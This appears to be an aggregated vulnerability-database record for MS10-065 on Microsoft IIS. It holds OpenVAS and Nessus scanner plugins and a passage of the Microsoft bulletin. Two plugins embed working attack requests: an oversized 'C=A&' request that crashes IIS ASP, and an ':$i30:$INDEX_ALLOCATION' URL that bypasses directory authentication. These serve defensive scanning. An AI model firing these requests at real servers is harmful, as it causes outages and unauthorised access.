vulnerability.\";\n\nif(description)\n{\n script_id(801520);\n script_version(\"$Revision: 5323 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-17 09:49:23 +0100 (Fri, 17 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-08 08:29:14 +0200 (Fri, 08 Oct 2010)\");\n script_bugtraq_id(43138);\n script_cve_id(\"CVE-2010-2730\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://bug.zerobox.org/show-2780-1.html\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/15167/\");\n script_xref(name : \"URL\" , value : \"http://www.deltadefensesystems.com/blog/?p=217\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_ms_iis_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\n\niisPort = get_http_port(default:80);\nif(!iisPort){\n exit(0);\n}\n\niisVer = get_kb_item(\"IIS/\" + iisPort + \"/Ver\");\nif(!iisVer){\n exit(0);\n}\n\nif(!safe_checks()){\n exit(0);\n}\n\n## checking for possible default files\nforeach files (make_list(\"login.asp\", \"index.asp\", \"default.asp\"))\n{\n for(i=0; i<10; i++)\n {\n ## Construct the request\n string = crap(data:\"C=A&\", length:160000);\n\n ## send the crafted request multiple times\n request = string(\"HEAD /\", files, \" HTTP/1.1 \\r\\n\",\n \"Host: \", 
get_host_name(), \"\\r\\n\",\n \"Connection:Close \\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded \\r\\n\",\n \"Content-Length:\", strlen(string),\"\\r\\n\\r\\n\", string);\n response = http_send_recv(port:iisPort, data:request);\n\n ## Check the service status after exploit\n if(ereg(pattern:\"^HTTP/[0-9]\\.[0-9] 503 .*\", string:response) &&\n (\"Service Unavailable\" >< response))\n {\n security_message(port:iisPort);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-08-19T13:03:06", "description": "The version of IIS installed on the remote host has the following vulnerabilities :\n\n - Sending a specially crafted request for an ASP page on a website hosted by IIS can result in a denial of service. (CVE-2010-1899)\n\n - Sending a specially crafted HTTP request to an IIS server with FastCGI enabled can result in remote code execution. (CVE-2010-2730)\n\n - Sending a specially crafted request to an IIS server running on Windows XP can allow a remote attacker to bypass the need to authenticate to access restricted resources. 
(CVE-2010-2731)", "cvss3": {"score": null, "vector": null}, "published": "2010-09-14T00:00:00", "type": "nessus", "title": "MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1899", "CVE-2010-2730", "CVE-2010-2731"], "modified": "2020-08-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS10-065.NASL", "href": "https://www.tenable.com/plugins/nessus/49223", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(49223);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/05\");\n\n script_cve_id(\"CVE-2010-1899\", \"CVE-2010-2730\", \"CVE-2010-2731\");\n script_bugtraq_id(41314, 43138, 43140);\n script_xref(name:\"IAVA\", value:\"2010-A-0120-S\");\n script_xref(name:\"MSFT\", value:\"MS10-065\");\n script_xref(name:\"MSKB\", value:\"2124261\");\n script_xref(name:\"MSKB\", value:\"2271195\");\n script_xref(name:\"MSKB\", value:\"2290570\");\n\n script_name(english:\"MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)\");\n script_summary(english:\"Checks versions of Asp.dll / Cgi.dll / Infocomm.dll\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server may allow remote code execution.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of IIS installed on the remote host has the following\nvulnerabilities :\n\n - Sending a specially crafted request for an ASP page\n on a website hosted by IIS can result in a denial of\n service. (CVE-2010-1899)\n\n - Sending a specially crafted HTTP request to an IIS\n server with FastCGI enabled can result in remote\n code execution. 
(CVE-2010-2730)\n\n - Sending a specially crafted request to an IIS server\n running on Windows XP can allow a remote attacker to\n bypass the need to authenticate to access restricted\n resources. (CVE-2010-2731)\"\n );\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-065\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?fcfe6e78\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for IIS on Windows XP, 2003,\nVista, 2008, 7, and 2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-065';\nkbs = make_list(\"2124261\", \"2271195\", \"2290570\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'1,2', win7:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_iis_installed() <= 0) audit(AUDIT_NOT_INST, \"IIS\");\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 and Windows Server 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", file:\"Asp.dll\", version:\"7.5.7600.20741\", min_version:\"7.5.7600.20000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Asp.dll\", version:\"7.5.7600.16620\", min_version:\"7.5.7600.16000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Cgi.dll\", version:\"7.5.7600.20752\", min_version:\"7.5.7600.20000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2271195') ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Cgi.dll\", version:\"7.5.7600.16632\", min_version:\"7.5.7600.16000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2271195') ||\n\n # Vista / Windows 2008\n 
hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Asp.dll\", version:\"7.0.6002.22431\", min_version:\"7.0.6002.22000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Asp.dll\", version:\"7.0.6002.18276\", min_version:\"7.0.6002.18000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Asp.dll\", version:\"7.0.6001.22718\", min_version:\"7.0.6001.22000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Asp.dll\", version:\"7.0.6001.18497\", min_version:\"7.0.6001.18000\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n\n # Windows 2003 / XP x64\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Asp.dll\", version:\"6.0.3790.4735\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261') ||\n\n # Windows XP x86\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"Infocomm.dll\", version:\"6.0.2600.6018\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2290570') ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"Asp51.dll\", version:\"5.1.2600.6007\", dir:\"\\system32\\inetsrv\", bulletin:bulletin, kb:'2124261')\n)\n{\n set_kb_item(name:'SMB/Missing/MS10-065', value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:48", "description": "According to the HTTP server banner the remote server is IIS 7.0. 
The server may be vulnerable to a number of vulnerabilities including a couple of remote code execution vulnerabilities.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-03T00:00:00", "type": "nessus", "title": "Microsoft IIS 7.0 Vulnerabilities (uncredentialed) (PCI/DSS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-1446", "CVE-2009-3555", "CVE-2010-1256", "CVE-2010-1899", "CVE-2010-2566", "CVE-2010-2730", "CVE-2010-2731"], "modified": "2020-08-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:iis"], "id": "IIS_7_PCI.NASL", "href": "https://www.tenable.com/plugins/nessus/108808", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(108808);\n script_version (\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/05\");\n\n script_cve_id(\n \"CVE-2008-1446\",\n \"CVE-2009-3555\",\n \"CVE-2010-1256\",\n \"CVE-2010-1899\",\n \"CVE-2010-2566\",\n \"CVE-2010-2730\",\n \"CVE-2010-2731\"\n );\n script_bugtraq_id(\n 31682,\n 36935,\n 40573,\n 42246,\n 41314,\n 43138,\n 43140\n );\n script_xref(name:\"MSFT\", value:\"MS08-062\");\n script_xref(name:\"MSFT\", value:\"MS10-040\");\n script_xref(name:\"MSFT\", value:\"MS10-049\");\n script_xref(name:\"MSFT\", value:\"MS10-065\");\n script_xref(name:\"MSKB\", value:\"953155\");\n script_xref(name:\"MSKB\", value:\"2124261\");\n script_xref(name:\"MSKB\", value:\"2271195\");\n script_xref(name:\"MSKB\", value:\"2290570\");\n script_xref(name:\"MSKB\", value:\"982666\");\n script_xref(name:\"MSKB\", value:\"973917\");\n script_xref(name:\"MSKB\", value:\"980436\");\n script_xref(name:\"IAVA\", value:\"2010-A-0120-S\");\n script_xref(name:\"IAVB\", value:\"2010-B-0045-S\");\n script_xref(name:\"IAVB\", value:\"2008-B-0075-S\");\n\n script_name(english:\"Microsoft IIS 7.0 Vulnerabilities (uncredentialed) (PCI/DSS)\");\n 
script_summary(english: \"Checks the web server banner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server may allow remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the HTTP server banner the remote server is\nIIS 7.0. The server may be vulnerable to a number of\nvulnerabilities including a couple of remote code execution\nvulnerabilities.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Ensure the appropriate patches have been applied.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(189, 310);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Web Servers\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_keys(\"www/iis\", \"Settings/ParanoidReport\", \"Settings/PCI_DSS\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Settings/PCI_DSS\"))\n{\n audit(AUDIT_PCI);\n}\n\nif (report_paranoia < 2)\n{\n audit(AUDIT_PARANOID);\n}\n\nget_kb_item_or_exit(\"www/iis\");\n\napp = \"Microsoft IIS\";\nport = get_http_port(default:80);\nbanner = get_http_banner(port:port);\nif (empty_or_null(banner) || \"Server: Microsoft-IIS\" >!< banner)\n{\n audit(AUDIT_NOT_DETECT, app, port);\n}\n\nif (\"Server: Microsoft-IIS/7.0\" >!< banner)\n{\n audit(AUDIT_LISTEN_NOT_VULN, app, port);\n}\n\nsecurity_report_v4(severity:SECURITY_HOLE, port:port);\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:18:44", "description": "The version of IIS 5.x installed on the remote host is affected by an authentication bypass vulnerability. 
It is possible to access protected web directories without authentication through use of an Alternate Data Stream to open protected folders.\n\nA remote, unauthenticated attacker can leverage this issue to gain access to protected web directories.", "cvss3": {"score": null, "vector": null}, "published": "2010-07-05T00:00:00", "type": "nessus", "title": "IIS 5.x Alternate Data Stream Authentication Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2731"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:microsoft:iis"], "id": "IIS_ALTERNATE_DATA_STREAM_AUTHENTICATION_BYPASS.NASL", "href": "https://www.tenable.com/plugins/nessus/47594", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47594);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2010-2731\");\n script_bugtraq_id(41314);\n script_xref(name:\"IAVA\", value:\"2010-A-0120-S\");\n script_xref(name:\"MSFT\", value:\"MS10-065\");\n script_xref(name:\"MSKB\", value:\"2124261\");\n script_xref(name:\"MSKB\", value:\"2271195\");\n script_xref(name:\"MSKB\", value:\"2290570\");\n script_xref(name:\"SECUNIA\", value:\"40412\");\n\n script_name(english:\"IIS 5.x Alternate Data Stream Authentication Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by an authentication bypass\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of IIS 5.x installed on the remote host is affected by an\nauthentication bypass vulnerability. 
It is possible to access\nprotected web directories without authentication through use of an\nAlternate Data Stream to open protected folders.\n\nA remote, unauthenticated attacker can leverage this issue to gain\naccess to protected web directories.\");\n # https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c4d2feac\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2010/Jul/12\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-065\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?fcfe6e78\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for IIS 5.1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-2731\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is 
Copyright (C) 2010-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"http_version.nasl\", \"webmirror.nasl\");\n script_require_keys(\"www/ASP\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nbanner = get_http_banner(port:port);\nif (!banner) exit(1, \"Unable to get the banner from the web server on port \"+port+\".\");\nif (\"Server: Microsoft-IIS/5\" >!< banner) exit(0, \"The web server on port \"+port+\" does not appear to be IIS 5.x\");\n\n\n# We need a protected page for our test.\npages = pages = get_kb_list(\"www/\"+port+\"/content/auth_required\");\nif (isnull(pages)) exit(0, \"No protected pages were detected on the web server on port \"+port+\".\");\npages = make_list(pages);\n\n# Try to get a protected subdirectory. 
This doesn't appear\n# to work against the root directory\npage = NULL;\nfor (i=0; i<max_index(pages); i++)\n{\n if (pages[i] =~ '^/[^/]+/.*')\n {\n page = pages[i];\n break;\n }\n}\nif (isnull(page)) exit(0, \"No protected subdirectories were detected on the web server on port \"+port+\".\");\nif (ereg(pattern:'/$', string:page)) page += 'default.asp';\n\n\n# Try a bogus attack.\nurl = ereg_replace(pattern:\"^(/.*)(/[^/]+)$\", replace:\"\\1:$i42:$NESSUS_CHECK\\2\", string:page);\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\nif (res[0] !~ \" (200|404)\") exit(1, \"The web server on port \"+port+\" didn't respond with a 202/404 response code to a bogus query.\");\n\n\n# And now the real attack.\nurl = ereg_replace(pattern:\"^(/.*)(/[^/]+)$\", replace:\"\\1:$i30:$INDEX_ALLOCATION\\2\", string:page);\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\nif (\n res[0] =~ '^HTTP/1\\\\.1 200' ||\n (report_paranoia > 1 && res[0] =~ '^HTTP/1\\\\.1 404')\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n' +\n 'Nessus was able to reproduce the issue using the following URL : \\n' +\n build_url(port:port, qs:url) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nexit(0, \"The IIS server on port \" + port + \" is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:36", "description": "Microsoft Security Bulletin MS10-065 - Important\r\nVulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)\r\nPublished: September 14, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves two privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Information Services (IIS). 
The most severe of these vulnerabilities could allow remote code execution if a client sends a specially crafted HTTP request to the server. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nThis security update is rated Important for IIS 5.1, IIS 6.0, IIS 7.0, and IIS 7.5. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerabilities by modifying the way that IIS handles specially crafted HTTP requests. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update at the earliest opportunity using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. Microsoft Knowledge Base Article 2267960 documents the currently known issues that customers may experience when installing this security update. The article also documents recommended solutions for these issues. 
When currently known issues and recommended solutions pertain only to specific releases of this software, this article provides links to further articles.\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tComponent\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\nInternet Information Services ASP\t \t \t \t \r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nInternet Information Services 5.1\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Information Services 6.0\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-006\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nInternet Information Services 6.0\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-006\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Information Services 6.0\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-006\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Information Services 6.0\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-006\r\n\r\nWindows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nInternet Information Services 7.0\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Information Services 
7.0\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2\r\n\t\r\n\r\nInternet Information Services 7.0*\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2\r\n\t\r\n\r\nInternet Information Services 7.0*\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nInternet Information Services 7.0\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for x64-based Systems\r\n\t\r\n\r\nInternet Information Services 7.5*\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n(KB2124261)\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\nInternet Information Services FastCGI\t \t \t \t \r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n(KB2271195)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n(KB2271195)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for x64-based 
Systems\r\n\t\r\n\r\nInternet Information Services 7.5*\r\n(KB2271195)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Information Services 7.5\r\n(KB2271195)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\nInternet Information Services Authentication\t \t \t \t \r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nInternet Information Services 5.1\r\n(KB2290570)\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhy are there three separate updates for this bulletin? \r\nThere are three separate updates due to the discrepancy in affected products for each vulnerability addressed in this bulletin. Please refer to the Affected Software table to determine which updates apply to your Web server.\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. 
